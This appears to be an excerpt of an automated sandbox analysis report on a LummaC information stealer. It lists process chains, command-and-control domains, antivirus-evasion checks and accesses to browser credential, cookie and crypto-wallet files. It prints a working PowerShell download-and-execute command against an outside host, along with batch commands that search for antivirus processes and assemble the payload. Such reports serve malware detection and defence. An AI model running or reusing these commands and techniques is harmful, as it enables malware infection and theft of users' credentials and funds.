        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000002.3137299827.000000000082A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000002.2644669345.000000000144F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
        LummaC encrypted strings found
        Source: M.com, 0000000D.00000003.2412794032.000000000472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: yokesandusj.sbs
        Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 811185Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ThousandJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "makes" Makes Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.comJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard cJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com M.com cJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
        Source: M.com, 0000000D.00000003.2420067526.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000000.2072904794.00000000009F3000.00000002.00000001.01000000.00000007.sdmp, Chancellor.9.dr, M.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: BrightLib.exe, 00000031.00000000.3070150341.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3110718350.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-STFPD.tmp.22.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
        Source: BrightLib.exe, 00000031.00000000.3070150341.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3110718350.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-STFPD.tmp.22.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\e1128dc0 VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 49_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,49_2_00491486
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
        Source: find.exe, 00000028.00000002.3031064355.000001E1443CB000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000028.00000002.3031147529.000001E144664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: powershell.exe, 00000011.00000002.2559366150.0000000007150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
